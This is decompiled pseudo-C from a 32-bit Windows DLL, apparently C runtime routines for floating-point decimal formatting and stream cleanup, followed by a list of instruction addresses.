                                                                                        																					_t1159 = _v1864;
                                                                                        																					asm("adc edi, edi");
                                                                                        																					_t1102 = _t1102 + 1;
                                                                                        																					continue;
                                                                                        																				}
                                                                                        																				goto L246;
                                                                                        																			}
                                                                                        																			goto L240;
                                                                                        																		}
                                                                                        																		goto L235;
                                                                                        																	}
                                                                                        																} else {
                                                                                        																	__eflags = _t1254 - _t1159;
                                                                                        																	if(_t1254 == _t1159) {
                                                                                        																		 *(_t1275 + _t1254 * 4 - 0x740) =  *(_t1275 + _t1254 * 4 - 0x740) & _t881;
                                                                                        																		_t526 = _t1254 + 1; // 0x1
                                                                                        																		_t1159 = _t526;
                                                                                        																		_v1864 = _t1159;
                                                                                        																	}
                                                                                        																	goto L242;
                                                                                        																}
                                                                                        																goto L246;
                                                                                        																L242:
                                                                                        																_t1254 = _t1254 + 1;
                                                                                        																__eflags = _t1254 - _t1101;
                                                                                        															} while (_t1254 != _t1101);
                                                                                        															goto L243;
                                                                                        														}
                                                                                        													} else {
                                                                                        														_t1209 = _v468;
                                                                                        														_v472 = _t1101;
                                                                                        														E1000BBAD( &_v468, _t1067,  &_v1396, _t1101 << 2);
                                                                                        														_t1281 =  &(_t1281[4]);
                                                                                        														__eflags = _t1209;
                                                                                        														if(_t1209 == 0) {
                                                                                        															goto L203;
                                                                                        														} else {
                                                                                        															__eflags = _t1209 - 1;
                                                                                        															if(_t1209 == 1) {
                                                                                        																goto L245;
                                                                                        															} else {
                                                                                        																__eflags = _v472;
                                                                                        																if(_v472 == 0) {
                                                                                        																	goto L245;
                                                                                        																} else {
                                                                                        																	_t1103 = 0;
                                                                                        																	_v1896 = _v472;
                                                                                        																	_t1255 = 0;
                                                                                        																	__eflags = 0;
                                                                                        																	do {
                                                                                        																		_t903 = _t1209;
                                                                                        																		_t1160 = _t903 *  *(_t1275 + _t1255 * 4 - 0x1d0) >> 0x20;
                                                                                        																		 *(_t1275 + _t1255 * 4 - 0x1d0) = _t903 *  *(_t1275 + _t1255 * 4 - 0x1d0) + _t1103;
                                                                                        																		asm("adc edx, 0x0");
                                                                                        																		_t1255 = _t1255 + 1;
                                                                                        																		_t1103 = _t1160;
                                                                                        																		__eflags = _t1255 - _v1896;
                                                                                        																	} while (_t1255 != _v1896);
                                                                                        																	goto L208;
                                                                                        																}
                                                                                        															}
                                                                                        														}
                                                                                        													}
                                                                                        												} else {
                                                                                        													_t1210 = _v1396;
                                                                                        													__eflags = _t1210;
                                                                                        													if(_t1210 != 0) {
                                                                                        														__eflags = _t1210 - 1;
                                                                                        														if(_t1210 == 1) {
                                                                                        															goto L245;
                                                                                        														} else {
                                                                                        															__eflags = _v472;
                                                                                        															if(_v472 == 0) {
                                                                                        																goto L245;
                                                                                        															} else {
                                                                                        																_t1104 = 0;
                                                                                        																_v1896 = _v472;
                                                                                        																_t1256 = 0;
                                                                                        																__eflags = 0;
                                                                                        																do {
                                                                                        																	_t908 = _t1210;
                                                                                        																	_t1161 = _t908 *  *(_t1275 + _t1256 * 4 - 0x1d0) >> 0x20;
                                                                                        																	 *(_t1275 + _t1256 * 4 - 0x1d0) = _t908 *  *(_t1275 + _t1256 * 4 - 0x1d0) + _t1104;
                                                                                        																	asm("adc edx, 0x0");
                                                                                        																	_t1256 = _t1256 + 1;
                                                                                        																	_t1104 = _t1161;
                                                                                        																	__eflags = _t1256 - _v1896;
                                                                                        																} while (_t1256 != _v1896);
                                                                                        																L208:
                                                                                        																__eflags = _t1103;
                                                                                        																if(_t1103 == 0) {
                                                                                        																	goto L245;
                                                                                        																} else {
                                                                                        																	_t906 = _v472;
                                                                                        																	__eflags = _t906 - 0x73;
                                                                                        																	if(_t906 >= 0x73) {
                                                                                        																		L258:
                                                                                        																		_v2408 = 0;
                                                                                        																		_v472 = 0;
                                                                                        																		E1000BBAD( &_v468, _t1067,  &_v2404, 0);
                                                                                        																		_t1281 =  &(_t1281[4]);
                                                                                        																		_t877 = 0;
                                                                                        																	} else {
                                                                                        																		 *(_t1275 + _t906 * 4 - 0x1d0) = _t1103;
                                                                                        																		_v472 = _v472 + 1;
                                                                                        																		goto L245;
                                                                                        																	}
                                                                                        																}
                                                                                        															}
                                                                                        														}
                                                                                        													} else {
                                                                                        														L203:
                                                                                        														_v2408 = 0;
                                                                                        														_v472 = 0;
                                                                                        														_push(0);
                                                                                        														_t874 =  &_v2404;
                                                                                        														L244:
                                                                                        														_push(_t874);
                                                                                        														_push(_t1067);
                                                                                        														_push( &_v468);
                                                                                        														E1000BBAD();
                                                                                        														_t1281 =  &(_t1281[4]);
                                                                                        														L245:
                                                                                        														_t877 = 1;
                                                                                        													}
                                                                                        												}
                                                                                        												L246:
                                                                                        												__eflags = _t877;
                                                                                        												if(_t877 == 0) {
                                                                                        													_v2408 = _v2408 & 0x00000000;
                                                                                        													_v472 = _v472 & 0x00000000;
                                                                                        													_push(0);
                                                                                        													L261:
                                                                                        													_push( &_v2404);
                                                                                        													_t855 =  &_v468;
                                                                                        													goto L262;
                                                                                        												} else {
                                                                                        													goto L247;
                                                                                        												}
                                                                                        												goto L263;
                                                                                        												L247:
                                                                                        												_t813 = _v1880 - _v1872;
                                                                                        												__eflags = _t813;
                                                                                        												_v1880 = _t813;
                                                                                        											} while (_t813 != 0);
                                                                                        											_t1088 = _v1884;
                                                                                        											goto L249;
                                                                                        										}
                                                                                        									} else {
                                                                                        										_t911 = _t811 / _t1087;
                                                                                        										_v1908 = _t911;
                                                                                        										_t1105 = _t811 % _t1087;
                                                                                        										_v1896 = _t1105;
                                                                                        										__eflags = _t911;
                                                                                        										if(_t911 == 0) {
                                                                                        											L184:
                                                                                        											__eflags = _t1105;
                                                                                        											if(_t1105 != 0) {
                                                                                        												_t1211 =  *(0x10015b7c + _t1105 * 4);
                                                                                        												__eflags = _t1211;
                                                                                        												if(_t1211 != 0) {
                                                                                        													__eflags = _t1211 - 1;
                                                                                        													if(_t1211 != 1) {
                                                                                        														_t912 = _v936;
                                                                                        														_v1896 = _t912;
                                                                                        														__eflags = _t912;
                                                                                        														if(_t912 != 0) {
                                                                                        															_t1257 = 0;
                                                                                        															_t1106 = 0;
                                                                                        															__eflags = 0;
                                                                                        															do {
                                                                                        																_t913 = _t1211;
                                                                                        																_t1165 = _t913 *  *(_t1275 + _t1106 * 4 - 0x3a0) >> 0x20;
                                                                                        																 *(_t1275 + _t1106 * 4 - 0x3a0) = _t913 *  *(_t1275 + _t1106 * 4 - 0x3a0) + _t1257;
                                                                                        																asm("adc edx, 0x0");
                                                                                        																_t1106 = _t1106 + 1;
                                                                                        																_t1257 = _t1165;
                                                                                        																__eflags = _t1106 - _v1896;
                                                                                        															} while (_t1106 != _v1896);
                                                                                        															__eflags = _t1257;
                                                                                        															if(_t1257 != 0) {
                                                                                        																_t916 = _v936;
                                                                                        																__eflags = _t916 - 0x73;
                                                                                        																if(_t916 >= 0x73) {
                                                                                        																	goto L186;
                                                                                        																} else {
                                                                                        																	 *(_t1275 + _t916 * 4 - 0x3a0) = _t1257;
                                                                                        																	_v936 = _v936 + 1;
                                                                                        																}
                                                                                        															}
                                                                                        														}
                                                                                        													}
                                                                                        												} else {
                                                                                        													L186:
                                                                                        													_v2408 = 0;
                                                                                        													_v936 = 0;
                                                                                        													_push(0);
                                                                                        													goto L190;
                                                                                        												}
                                                                                        											}
                                                                                        										} else {
                                                                                        											do {
                                                                                        												__eflags = _t911 - 0x26;
                                                                                        												if(_t911 > 0x26) {
                                                                                        													_t911 = 0x26;
                                                                                        												}
                                                                                        												_t1107 =  *(0x10015ae6 + _t911 * 4) & 0x000000ff;
                                                                                        												_v1888 = _t911;
                                                                                        												_v1400 = ( *(0x10015ae6 + _t911 * 4) & 0x000000ff) + ( *(0x10015ae7 + _t911 * 4) & 0x000000ff);
                                                                                        												E10003E50(_t1107 << 2,  &_v1396, 0, _t1107 << 2);
                                                                                        												_t929 = E10005A60( &(( &_v1396)[_t1107]), 0x100151e0 + ( *(0x10015ae4 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0x10015ae7 + _t911 * 4) & 0x000000ff) << 2);
                                                                                        												_t1108 = _v1400;
                                                                                        												_t1281 =  &(_t1281[6]);
                                                                                        												_v1892 = _t1108;
                                                                                        												__eflags = _t1108 - 1;
                                                                                        												if(_t1108 > 1) {
                                                                                        													__eflags = _v936 - 1;
                                                                                        													if(_v936 > 1) {
                                                                                        														__eflags = _t1108 - _v936;
                                                                                        														_t1214 =  &_v1396;
                                                                                        														_t930 = _t929 & 0xffffff00 | _t1108 - _v936 > 0x00000000;
                                                                                        														__eflags = _t930;
                                                                                        														if(_t930 != 0) {
                                                                                        															_t1166 =  &_v932;
                                                                                        														} else {
                                                                                        															_t1214 =  &_v932;
                                                                                        															_t1166 =  &_v1396;
                                                                                        														}
                                                                                        														_v1876 = _t1166;
                                                                                        														__eflags = _t930;
                                                                                        														if(_t930 == 0) {
                                                                                        															_t1108 = _v936;
                                                                                        														}
                                                                                        														_v1880 = _t1108;
                                                                                        														__eflags = _t930;
                                                                                        														if(_t930 != 0) {
                                                                                        															_v1892 = _v936;
                                                                                        														}
                                                                                        														_t1167 = 0;
                                                                                        														_t1259 = 0;
                                                                                        														_v1864 = 0;
                                                                                        														__eflags = _t1108;
                                                                                        														if(_t1108 == 0) {
                                                                                        															L177:
                                                                                        															_v936 = _t1167;
                                                                                        															_t932 = _t1167 << 2;
                                                                                        															__eflags = _t932;
                                                                                        															goto L178;
                                                                                        														} else {
                                                                                        															_t1215 = _t1214 -  &_v1860;
                                                                                        															__eflags = _t1215;
                                                                                        															_v1928 = _t1215;
                                                                                        															do {
                                                                                        																_t940 =  *(_t1275 + _t1215 + _t1259 * 4 - 0x740);
                                                                                        																_v1884 = _t940;
                                                                                        																__eflags = _t940;
                                                                                        																if(_t940 != 0) {
                                                                                        																	_t941 = 0;
                                                                                        																	_t1216 = 0;
                                                                                        																	_t1109 = _t1259;
                                                                                        																	_v1872 = 0;
                                                                                        																	__eflags = _v1892;
                                                                                        																	if(_v1892 == 0) {
                                                                                        																		L174:
                                                                                        																		__eflags = _t1109 - 0x73;
                                                                                        																		if(_t1109 == 0x73) {
                                                                                        																			goto L187;
                                                                                        																		} else {
                                                                                        																			_t1215 = _v1928;
                                                                                        																			_t1108 = _v1880;
                                                                                        																			goto L176;
                                                                                        																		}
                                                                                        																	} else {
                                                                                        																		while(1) {
                                                                                        																			__eflags = _t1109 - 0x73;
                                                                                        																			if(_t1109 == 0x73) {
                                                                                        																				goto L169;
                                                                                        																			}
                                                                                        																			__eflags = _t1109 - _t1167;
                                                                                        																			if(_t1109 == _t1167) {
                                                                                        																				 *(_t1275 + _t1109 * 4 - 0x740) =  *(_t1275 + _t1109 * 4 - 0x740) & 0x00000000;
                                                                                        																				_t953 = _t941 + 1 + _t1259;
                                                                                        																				__eflags = _t953;
                                                                                        																				_v1864 = _t953;
                                                                                        																				_t941 = _v1872;
                                                                                        																			}
                                                                                        																			_t948 =  *(_v1876 + _t941 * 4);
                                                                                        																			asm("adc edx, 0x0");
                                                                                        																			 *(_t1275 + _t1109 * 4 - 0x740) =  *(_t1275 + _t1109 * 4 - 0x740) + _t948 * _v1884 + _t1216;
                                                                                        																			asm("adc edx, 0x0");
                                                                                        																			_t941 = _v1872 + 1;
                                                                                        																			_t1109 = _t1109 + 1;
                                                                                        																			_v1872 = _t941;
                                                                                        																			_t1216 = _t948 * _v1884 >> 0x20;
                                                                                        																			_t1167 = _v1864;
                                                                                        																			__eflags = _t941 - _v1892;
                                                                                        																			if(_t941 != _v1892) {
                                                                                        																				continue;
                                                                                        																			} else {
                                                                                        																				goto L169;
                                                                                        																			}
                                                                                        																			while(1) {
                                                                                        																				L169:
                                                                                        																				__eflags = _t1216;
                                                                                        																				if(_t1216 == 0) {
                                                                                        																					goto L174;
                                                                                        																				}
                                                                                        																				__eflags = _t1109 - 0x73;
                                                                                        																				if(_t1109 == 0x73) {
                                                                                        																					L187:
                                                                                        																					__eflags = 0;
                                                                                        																					_v2408 = 0;
                                                                                        																					_v936 = 0;
                                                                                        																					_push(0);
                                                                                        																					_t943 =  &_v2404;
                                                                                        																					goto L188;
                                                                                        																				} else {
                                                                                        																					__eflags = _t1109 - _t1167;
                                                                                        																					if(_t1109 == _t1167) {
                                                                                        																						_t370 = _t1275 + _t1109 * 4 - 0x740;
                                                                                        																						 *_t370 =  *(_t1275 + _t1109 * 4 - 0x740) & 0x00000000;
                                                                                        																						__eflags =  *_t370;
                                                                                        																						_t376 = _t1109 + 1; // 0x1
                                                                                        																						_v1864 = _t376;
                                                                                        																					}
                                                                                        																					_t946 = _t1216;
                                                                                        																					_t1216 = 0;
                                                                                        																					 *(_t1275 + _t1109 * 4 - 0x740) =  *(_t1275 + _t1109 * 4 - 0x740) + _t946;
                                                                                        																					_t1167 = _v1864;
                                                                                        																					asm("adc edi, edi");
                                                                                        																					_t1109 = _t1109 + 1;
                                                                                        																					continue;
                                                                                        																				}
                                                                                        																				goto L181;
                                                                                        																			}
                                                                                        																			goto L174;
                                                                                        																		}
                                                                                        																		goto L169;
                                                                                        																	}
                                                                                        																} else {
                                                                                        																	__eflags = _t1259 - _t1167;
                                                                                        																	if(_t1259 == _t1167) {
                                                                                        																		 *(_t1275 + _t1259 * 4 - 0x740) =  *(_t1275 + _t1259 * 4 - 0x740) & _t940;
                                                                                        																		_t338 = _t1259 + 1; // 0x1
                                                                                        																		_t1167 = _t338;
                                                                                        																		_v1864 = _t1167;
                                                                                        																	}
                                                                                        																	goto L176;
                                                                                        																}
                                                                                        																goto L181;
                                                                                        																L176:
                                                                                        																_t1259 = _t1259 + 1;
                                                                                        																__eflags = _t1259 - _t1108;
                                                                                        															} while (_t1259 != _t1108);
                                                                                        															goto L177;
                                                                                        														}
                                                                                        													} else {
                                                                                        														_t1217 = _v932;
                                                                                        														_v936 = _t1108;
                                                                                        														E1000BBAD( &_v932, _t1067,  &_v1396, _t1108 << 2);
                                                                                        														_t1281 =  &(_t1281[4]);
                                                                                        														__eflags = _t1217;
                                                                                        														if(_t1217 != 0) {
                                                                                        															__eflags = _t1217 - 1;
                                                                                        															if(_t1217 == 1) {
                                                                                        																goto L180;
                                                                                        															} else {
                                                                                        																__eflags = _v936;
                                                                                        																if(_v936 == 0) {
                                                                                        																	goto L180;
                                                                                        																} else {
                                                                                        																	_t1110 = 0;
                                                                                        																	_v1884 = _v936;
                                                                                        																	_t1260 = 0;
                                                                                        																	__eflags = 0;
                                                                                        																	do {
                                                                                        																		_t961 = _t1217;
                                                                                        																		_t1168 = _t961 *  *(_t1275 + _t1260 * 4 - 0x3a0) >> 0x20;
                                                                                        																		 *(_t1275 + _t1260 * 4 - 0x3a0) = _t961 *  *(_t1275 + _t1260 * 4 - 0x3a0) + _t1110;
                                                                                        																		asm("adc edx, 0x0");
                                                                                        																		_t1260 = _t1260 + 1;
                                                                                        																		_t1110 = _t1168;
                                                                                        																		__eflags = _t1260 - _v1884;
                                                                                        																	} while (_t1260 != _v1884);
                                                                                        																	goto L149;
                                                                                        																}
                                                                                        															}
                                                                                        														} else {
                                                                                        															_v1400 = 0;
                                                                                        															_v936 = 0;
                                                                                        															_push(0);
                                                                                        															_t933 =  &_v1396;
                                                                                        															goto L179;
                                                                                        														}
                                                                                        													}
                                                                                        												} else {
                                                                                        													_t1218 = _v1396;
                                                                                        													__eflags = _t1218;
                                                                                        													if(_t1218 != 0) {
                                                                                        														__eflags = _t1218 - 1;
                                                                                        														if(_t1218 == 1) {
                                                                                        															goto L180;
                                                                                        														} else {
                                                                                        															__eflags = _v936;
                                                                                        															if(_v936 == 0) {
                                                                                        																goto L180;
                                                                                        															} else {
                                                                                        																_t1111 = 0;
                                                                                        																_v1884 = _v936;
                                                                                        																_t1261 = 0;
                                                                                        																__eflags = 0;
                                                                                        																do {
                                                                                        																	_t968 = _t1218;
                                                                                        																	_t1169 = _t968 *  *(_t1275 + _t1261 * 4 - 0x3a0) >> 0x20;
                                                                                        																	 *(_t1275 + _t1261 * 4 - 0x3a0) = _t968 *  *(_t1275 + _t1261 * 4 - 0x3a0) + _t1111;
                                                                                        																	asm("adc edx, 0x0");
                                                                                        																	_t1261 = _t1261 + 1;
                                                                                        																	_t1111 = _t1169;
                                                                                        																	__eflags = _t1261 - _v1884;
                                                                                        																} while (_t1261 != _v1884);
                                                                                        																L149:
                                                                                        																__eflags = _t1110;
                                                                                        																if(_t1110 == 0) {
                                                                                        																	goto L180;
                                                                                        																} else {
                                                                                        																	_t964 = _v936;
                                                                                        																	__eflags = _t964 - 0x73;
                                                                                        																	if(_t964 < 0x73) {
                                                                                        																		 *(_t1275 + _t964 * 4 - 0x3a0) = _t1110;
                                                                                        																		_v936 = _v936 + 1;
                                                                                        																		goto L180;
                                                                                        																	} else {
                                                                                        																		_v1400 = 0;
                                                                                        																		_v936 = 0;
                                                                                        																		_push(0);
                                                                                        																		_t943 =  &_v1396;
                                                                                        																		L188:
                                                                                        																		_push(_t943);
                                                                                        																		_push(_t1067);
                                                                                        																		_push( &_v932);
                                                                                        																		E1000BBAD();
                                                                                        																		_t1281 =  &(_t1281[4]);
                                                                                        																		_t936 = 0;
                                                                                        																	}
                                                                                        																}
                                                                                        															}
                                                                                        														}
                                                                                        													} else {
                                                                                        														_t932 = 0;
                                                                                        														_v1864 = 0;
                                                                                        														_v936 = 0;
                                                                                        														L178:
                                                                                        														_push(_t932);
                                                                                        														_t933 =  &_v1860;
                                                                                        														L179:
                                                                                        														_push(_t933);
                                                                                        														_push(_t1067);
                                                                                        														_push( &_v932);
                                                                                        														E1000BBAD();
                                                                                        														_t1281 =  &(_t1281[4]);
                                                                                        														L180:
                                                                                        														_t936 = 1;
                                                                                        													}
                                                                                        												}
                                                                                        												L181:
                                                                                        												__eflags = _t936;
                                                                                        												if(_t936 == 0) {
                                                                                        													_v2408 = _v2408 & 0x00000000;
                                                                                        													_t404 =  &_v936;
                                                                                        													 *_t404 = _v936 & 0x00000000;
                                                                                        													__eflags =  *_t404;
                                                                                        													_push(0);
                                                                                        													L190:
                                                                                        													_push( &_v2404);
                                                                                        													_t855 =  &_v932;
                                                                                        													L262:
                                                                                        													_push(_t1067);
                                                                                        													_push(_t855);
                                                                                        													E1000BBAD();
                                                                                        													_t1281 =  &(_t1281[4]);
                                                                                        												} else {
                                                                                        													goto L182;
                                                                                        												}
                                                                                        												goto L263;
                                                                                        												L182:
                                                                                        												_t911 = _v1908 - _v1888;
                                                                                        												__eflags = _t911;
                                                                                        												_v1908 = _t911;
                                                                                        											} while (_t911 != 0);
                                                                                        											_t1105 = _v1896;
                                                                                        											goto L184;
                                                                                        										}
                                                                                        									}
                                                                                        									L263:
                                                                                        									_t1198 = _v1920;
                                                                                        									_t1247 = _t1198;
                                                                                        									_t1089 = _v472;
                                                                                        									_v1872 = _t1247;
                                                                                        									__eflags = _t1089;
                                                                                        									if(_t1089 != 0) {
                                                                                        										_t1251 = 0;
                                                                                        										_t1202 = 0;
                                                                                        										__eflags = 0;
                                                                                        										do {
                                                                                        											_t844 =  *(_t1275 + _t1202 * 4 - 0x1d0);
                                                                                        											_t1155 = 0xa;
                                                                                        											_t1156 = _t844 * _t1155 >> 0x20;
                                                                                        											 *(_t1275 + _t1202 * 4 - 0x1d0) = _t844 * _t1155 + _t1251;
                                                                                        											asm("adc edx, 0x0");
                                                                                        											_t1202 = _t1202 + 1;
                                                                                        											_t1251 = _t1156;
                                                                                        											__eflags = _t1202 - _t1089;
                                                                                        										} while (_t1202 != _t1089);
                                                                                        										_v1896 = _t1251;
                                                                                        										__eflags = _t1251;
                                                                                        										_t1247 = _v1872;
                                                                                        										if(_t1251 != 0) {
                                                                                        											_t1098 = _v472;
                                                                                        											__eflags = _t1098 - 0x73;
                                                                                        											if(_t1098 >= 0x73) {
                                                                                        												__eflags = 0;
                                                                                        												_v2408 = 0;
                                                                                        												_v472 = 0;
                                                                                        												E1000BBAD( &_v468, _t1067,  &_v2404, 0);
                                                                                        												_t1281 =  &(_t1281[4]);
                                                                                        											} else {
                                                                                        												 *(_t1275 + _t1098 * 4 - 0x1d0) = _t1156;
                                                                                        												_v472 = _v472 + 1;
                                                                                        											}
                                                                                        										}
                                                                                        										_t1198 = _t1247;
                                                                                        									}
                                                                                        									_t816 = E1000CB30( &_v472,  &_v936);
                                                                                        									_t1148 = 0xa;
                                                                                        									__eflags = _t816 - _t1148;
                                                                                        									if(_t816 != _t1148) {
                                                                                        										__eflags = _t816;
                                                                                        										if(_t816 != 0) {
                                                                                        											_t817 = _t816 + 0x30;
                                                                                        											__eflags = _t817;
                                                                                        											_t1247 = _t1198 + 1;
                                                                                        											 *_t1198 = _t817;
                                                                                        											_v1872 = _t1247;
                                                                                        											goto L282;
                                                                                        										} else {
                                                                                        											_t818 = _v1904 - 1;
                                                                                        										}
                                                                                        									} else {
                                                                                        										_v1904 = _v1904 + 1;
                                                                                        										_t1247 = _t1198 + 1;
                                                                                        										_t835 = _v936;
                                                                                        										 *_t1198 = 0x31;
                                                                                        										_v1872 = _t1247;
                                                                                        										__eflags = _t835;
                                                                                        										if(_t835 != 0) {
                                                                                        											_t1201 = 0;
                                                                                        											_t1250 = _t835;
                                                                                        											_t1097 = 0;
                                                                                        											__eflags = 0;
                                                                                        											do {
                                                                                        												_t836 =  *(_t1275 + _t1097 * 4 - 0x3a0);
                                                                                        												 *(_t1275 + _t1097 * 4 - 0x3a0) = _t836 * _t1148 + _t1201;
                                                                                        												asm("adc edx, 0x0");
                                                                                        												_t1097 = _t1097 + 1;
                                                                                        												_t1201 = _t836 * _t1148 >> 0x20;
                                                                                        												_t1148 = 0xa;
                                                                                        												__eflags = _t1097 - _t1250;
                                                                                        											} while (_t1097 != _t1250);
                                                                                        											_t1247 = _v1872;
                                                                                        											__eflags = _t1201;
                                                                                        											if(_t1201 != 0) {
                                                                                        												_t839 = _v936;
                                                                                        												__eflags = _t839 - 0x73;
                                                                                        												if(_t839 >= 0x73) {
                                                                                        													_v2408 = 0;
                                                                                        													_v936 = 0;
                                                                                        													E1000BBAD( &_v932, _t1067,  &_v2404, 0);
                                                                                        													_t1281 =  &(_t1281[4]);
                                                                                        												} else {
                                                                                        													 *(_t1275 + _t839 * 4 - 0x3a0) = _t1201;
                                                                                        													_v936 = _v936 + 1;
                                                                                        												}
                                                                                        											}
                                                                                        										}
                                                                                        										L282:
                                                                                        										_t818 = _v1904;
                                                                                        									}
                                                                                        									 *((intOrPtr*)(_v1924 + 4)) = _t818;
                                                                                        									_t1073 = _v1916;
                                                                                        									__eflags = _t818;
                                                                                        									if(_t818 >= 0) {
                                                                                        										__eflags = _t1073 - 0x7fffffff;
                                                                                        										if(_t1073 <= 0x7fffffff) {
                                                                                        											_t1073 = _t1073 + _t818;
                                                                                        											__eflags = _t1073;
                                                                                        										}
                                                                                        									}
                                                                                        									_t820 = _a24 - 1;
                                                                                        									__eflags = _t820 - _t1073;
                                                                                        									if(_t820 >= _t1073) {
                                                                                        										_t820 = _t1073;
                                                                                        									}
                                                                                        									_t821 = _t820 + _v1920;
                                                                                        									_v1916 = _t821;
                                                                                        									__eflags = _t1247 - _t821;
                                                                                        									if(__eflags != 0) {
                                                                                        										while(1) {
                                                                                        											_t822 = _v472;
                                                                                        											__eflags = _t822;
                                                                                        											if(__eflags == 0) {
                                                                                        												goto L303;
                                                                                        											}
                                                                                        											_t1199 = 0;
                                                                                        											_t1248 = _t822;
                                                                                        											_t1093 = 0;
                                                                                        											__eflags = 0;
                                                                                        											do {
                                                                                        												_t823 =  *(_t1275 + _t1093 * 4 - 0x1d0);
                                                                                        												 *(_t1275 + _t1093 * 4 - 0x1d0) = _t823 * 0x3b9aca00 + _t1199;
                                                                                        												asm("adc edx, 0x0");
                                                                                        												_t1093 = _t1093 + 1;
                                                                                        												_t1199 = _t823 * 0x3b9aca00 >> 0x20;
                                                                                        												__eflags = _t1093 - _t1248;
                                                                                        											} while (_t1093 != _t1248);
                                                                                        											_t1249 = _v1872;
                                                                                        											__eflags = _t1199;
                                                                                        											if(_t1199 != 0) {
                                                                                        												_t829 = _v472;
                                                                                        												__eflags = _t829 - 0x73;
                                                                                        												if(_t829 >= 0x73) {
                                                                                        													__eflags = 0;
                                                                                        													_v2408 = 0;
                                                                                        													_v472 = 0;
                                                                                        													E1000BBAD( &_v468, _t1067,  &_v2404, 0);
                                                                                        													_t1281 =  &(_t1281[4]);
                                                                                        												} else {
                                                                                        													 *(_t1275 + _t829 * 4 - 0x1d0) = _t1199;
                                                                                        													_v472 = _v472 + 1;
                                                                                        												}
                                                                                        											}
                                                                                        											_t828 = E1000CB30( &_v472,  &_v936);
                                                                                        											_t1200 = 8;
                                                                                        											_t1073 = _v1916 - _t1249;
                                                                                        											__eflags = _t1073;
                                                                                        											do {
                                                                                        												_t708 = _t828 % _v1912;
                                                                                        												_t828 = _t828 / _v1912;
                                                                                        												_t1153 = _t708 + 0x30;
                                                                                        												__eflags = _t1073 - _t1200;
                                                                                        												if(_t1073 >= _t1200) {
                                                                                        													 *((char*)(_t1200 + _t1249)) = _t1153;
                                                                                        												}
                                                                                        												_t1200 = _t1200 - 1;
                                                                                        												__eflags = _t1200 - 0xffffffff;
                                                                                        											} while (_t1200 != 0xffffffff);
                                                                                        											__eflags = _t1073 - 9;
                                                                                        											if(_t1073 > 9) {
                                                                                        												_t1073 = 9;
                                                                                        											}
                                                                                        											_t1247 = _t1249 + _t1073;
                                                                                        											_v1872 = _t1247;
                                                                                        											__eflags = _t1247 - _v1916;
                                                                                        											if(__eflags != 0) {
                                                                                        												continue;
                                                                                        											}
                                                                                        											goto L303;
                                                                                        										}
                                                                                        									}
                                                                                        									L303:
                                                                                        									 *_t1247 = 0;
                                                                                        									goto L309;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        				} else {
                                                                                        					_t1073 = _t1238 & 0x000fffff;
                                                                                        					if((_t1190 | _t1238 & 0x000fffff) != 0) {
                                                                                        						goto L5;
                                                                                        					} else {
                                                                                        						_push(0x10015ba4);
                                                                                        						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
                                                                                        						L308:
                                                                                        						_push(_a24);
                                                                                        						_push(_t1058);
                                                                                        						if(E10008780() != 0) {
                                                                                        							_push(0);
                                                                                        							_push(0);
                                                                                        							_push(0);
                                                                                        							_push(0);
                                                                                        							_push(0);
                                                                                        							E100061FC();
                                                                                        							asm("int3");
                                                                                        							_push(0x10);
                                                                                        							E10003410();
                                                                                        							_v32 = _v32 & 0x00000000;
                                                                                        							E1000AA1D(8);
                                                                                        							_t1074 = 0x100195f0;
                                                                                        							_t721 =  &_v8;
                                                                                        							 *_t721 = _v8 & 0x00000000;
                                                                                        							__eflags =  *_t721;
                                                                                        							_t1239 = 3;
                                                                                        							while(1) {
                                                                                        								_v36 = _t1239;
                                                                                        								__eflags = _t1239 -  *0x1001ada0; // 0x200
                                                                                        								if(__eflags == 0) {
                                                                                        									break;
                                                                                        								}
                                                                                        								_t763 =  *0x1001ada4; // 0x0
                                                                                        								_t764 =  *(_t763 + _t1239 * 4);
                                                                                        								__eflags = _t764;
                                                                                        								if(_t764 != 0) {
                                                                                        									_t766 =  *(_t764 + 0xc) >> 0xd;
                                                                                        									__eflags = _t766 & 0x00000001;
                                                                                        									if((_t766 & 0x00000001) != 0) {
                                                                                        										_t773 =  *0x1001ada4; // 0x0
                                                                                        										_push( *((intOrPtr*)(_t773 + _t1239 * 4)));
                                                                                        										_t774 = E100100F3(_t1074);
                                                                                        										__eflags = _t774 - 0xffffffff;
                                                                                        										if(_t774 != 0xffffffff) {
                                                                                        											_t731 =  &_v32;
                                                                                        											 *_t731 = _v32 + 1;
                                                                                        											__eflags =  *_t731;
                                                                                        										}
                                                                                        									}
                                                                                        									_t767 =  *0x1001ada4; // 0x0
                                                                                        									DeleteCriticalSection( *((intOrPtr*)(_t767 + _t1239 * 4)) + 0x20);
                                                                                        									_t770 =  *0x1001ada4; // 0x0
                                                                                        									E10009811( *((intOrPtr*)(_t770 + _t1239 * 4)));
                                                                                        									_pop(_t1074);
                                                                                        									_t772 =  *0x1001ada4; // 0x0
                                                                                        									_t737 = _t772 + _t1239 * 4;
                                                                                        									 *_t737 =  *(_t772 + _t1239 * 4) & 0x00000000;
                                                                                        									__eflags =  *_t737;
                                                                                        								}
                                                                                        								_t1239 = _t1239 + 1;
                                                                                        							}
                                                                                        							_v8 = 0xfffffffe;
                                                                                        							E1000E411();
                                                                                        							return E10003456(_v32);
                                                                                        						} else {
                                                                                        							L309:
                                                                                        							_t1288 = _v1936;
                                                                                        							if(_v1936 != 0) {
                                                                                        								E1000F458(_t1073, _t1288,  &_v1944);
                                                                                        							}
                                                                                        							return E1000296F(_v8 ^ _t1275);
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        			}

































































































































































































































































                                                                                        0x1000cfe1
                                                                                        0x1000cfe3
                                                                                        0x1000cfe9
                                                                                        0x1000cff0
                                                                                        0x1000cff4
                                                                                        0x1000cffd
                                                                                        0x1000cffe
                                                                                        0x1000cfff
                                                                                        0x1000d002
                                                                                        0x1000d008
                                                                                        0x1000d00e
                                                                                        0x1000d013
                                                                                        0x1000d022
                                                                                        0x1000d024
                                                                                        0x1000d026
                                                                                        0x1000d026
                                                                                        0x1000d02d
                                                                                        0x1000d037
                                                                                        0x1000d03c
                                                                                        0x1000d03f
                                                                                        0x1000d063
                                                                                        0x1000d067
                                                                                        0x1000d06c
                                                                                        0x1000d06d
                                                                                        0x1000d06f
                                                                                        0x1000d071
                                                                                        0x1000d077
                                                                                        0x1000d077
                                                                                        0x1000d07e
                                                                                        0x1000d07e
                                                                                        0x1000d081
                                                                                        0x1000e331
                                                                                        0x00000000
